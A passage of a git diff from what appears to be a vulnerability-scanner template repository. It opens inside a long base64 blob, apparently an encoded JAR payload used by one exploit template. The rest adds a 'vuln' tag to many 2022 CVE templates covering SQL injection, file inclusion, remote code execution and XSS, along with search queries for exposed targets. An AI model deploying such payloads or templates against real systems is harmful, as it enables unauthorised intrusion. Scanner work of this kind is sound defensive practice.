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')}}" diff --git a/http/cves/2022/CVE-2022-25322.yaml b/http/cves/2022/CVE-2022-25322.yaml index a826e49266a..f58bb2cbd9d 100644 --- a/http/cves/2022/CVE-2022-25322.yaml +++ b/http/cves/2022/CVE-2022-25322.yaml @@ -26,7 +26,7 @@ info: vendor: zerof product: web_server shodan-query: "Server: ZEROF Web Server" - tags: cve,cve2022,zerof,sqli,vkev + tags: cve,cve2022,zerof,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index b145eade97b..922e4dd1d04 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -28,7 +28,7 @@ info: vendor: zerof product: web_server shodan-query: cpe:"cpe:2.3:a:google:web_server" - tags: cve,cve2022,xss,zerof + tags: cve,cve2022,xss,zerof,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index a51efd1cbe6..ebb1ca5ed90 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/searchwp-live-ajax-search/ fofa-query: body=/wp-content/plugins/searchwp-live-ajax-search/ publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" - tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index de4e5bc8e2a..318afc6775d 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -32,7 +32,7 @@ info: google-query: - inurl:"/SecurityGateway.dll" - inurl:"/securitygateway.dll" - tags: cve,cve2022,altn,gateway,xml,injection + tags: cve,cve2022,altn,gateway,xml,injection,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml index d06ee98959e..d85693b99fe 100644 --- a/http/cves/2022/CVE-2022-25369.yaml +++ b/http/cves/2022/CVE-2022-25369.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Dynamicweb" - tags: cve2022,cve,dynamicweb,rce,unauth,vkev + tags: cve2022,cve,dynamicweb,rce,unauth,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index 728f2f39e6a..87b880449f9 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -29,7 +29,7 @@ info: vendor: wpmanageninja product: ninja_job_board framework: wordpress - tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja + tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 5035df73567..cc7e9a86ca5 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -30,7 +30,7 @@ info: vendor: servmask product: all-in-one_wp_migration framework: wordpress - tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask + tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 49358be9ba4..347facca151 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -37,7 +37,7 @@ info: - title="thinkphp" - header="think_lang" google-query: intitle:"thinkphp" - tags: cve,cve2022,thinkphp,exposure,oss + tags: cve,cve2022,thinkphp,exposure,oss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 1811b2f47da..110f1474823 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,cuppacms,vkev + tags: cve,cve2022,lfi,cuppa,cuppacms,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 79a5ed95a63..45c956ad16d 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,cuppacms,vkev + tags: cve,cve2022,lfi,cuppa,cuppacms,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index b714805801c..a4f7269f683 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: thedigitalcraft product: atomcms - tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload,vkev + tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload,vkev,vuln variables: string: "CVE-2022-25487" diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 3b0590147b5..adb054fdc17 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,sqli,atom,cms,thedigitalcraft,vkev + tags: cve,cve2022,sqli,atom,cms,thedigitalcraft,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index fe4e1499a69..b44b5d4b349 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,xss,atom,cms,thedigitalcraft + tags: cve,cve2022,xss,atom,cms,thedigitalcraft,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index b493ba30780..68da1f6940a 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms + tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 0f8edb8d949..268f2afabbb 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -32,7 +32,7 @@ info: google-query: - inurl:/backups-dup-lite/dup-installer/ - inurl:"/wp-content/plugins/duplicator" - tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek,vkev + tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2552.yaml b/http/cves/2022/CVE-2022-2552.yaml index a4cef9761d4..69bc572552b 100644 --- a/http/cves/2022/CVE-2022-2552.yaml +++ b/http/cves/2022/CVE-2022-2552.yaml @@ -23,7 +23,7 @@ info: fofa-query: body="/wp-content/plugins/duplicator" vendor: snapcreek product: wp_go_maps - tags: cve,cve2022,wp,wp-plugin,wordpress,duplicator,disclosure + tags: cve,cve2022,wp,wp-plugin,wordpress,duplicator,disclosure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index e5943e0ebc2..5469dbaa6b0 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -29,7 +29,7 @@ info: - html:"MotionEye" - http.html:"motioneye" fofa-query: body="motioneye" - tags: cve,cve2022,motioneye,config,motioneye_project + tags: cve,cve2022,motioneye,config,motioneye_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 6c8cd90d7b2..80c2cfb4af9 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -29,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index c278ea28046..cb7f3acb2bd 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -33,7 +33,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian,vkev + tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index c96b40a40ae..12aeb46e5ae 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" - tags: cve2022,cve,confluence,atlassian,default-login,kev,vkev + tags: cve2022,cve,confluence,atlassian,default-login,kev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 24fa5e2cebe..23151c0a3cf 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -37,7 +37,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve,cve2022,grafana,zabbix,exposure + tags: cve,cve2022,grafana,zabbix,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 3892faee01a..0b3ab8949f9 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ametys product: ametys - tags: cve,cve2022,plugin,ametys,cms + tags: cve,cve2022,plugin,ametys,cms,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 8e6c71e7123..92fed7c3ec3 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: barco product: control_room_management_suite - tags: cve,cve2022,barco,lfi,seclists,packetstorm + tags: cve,cve2022,barco,lfi,seclists,packetstorm,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index a4716a91b8f..708cbd9aea7 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -31,7 +31,7 @@ info: google-query: - inurl:/u8sl/WebHelp - inurl:/u8sl/webhelp - tags: cve,cve2022,yonyou,xss,headless + tags: cve,cve2022,yonyou,xss,headless,vuln headless: - steps: - args: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 3cd8c655e8c..8baed850b9e 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -31,7 +31,7 @@ info: publicwww-query: - "/wp-content/themes/Newspaper" - /wp-content/themes/newspaper - tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv + tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26271.yaml b/http/cves/2022/CVE-2022-26271.yaml index 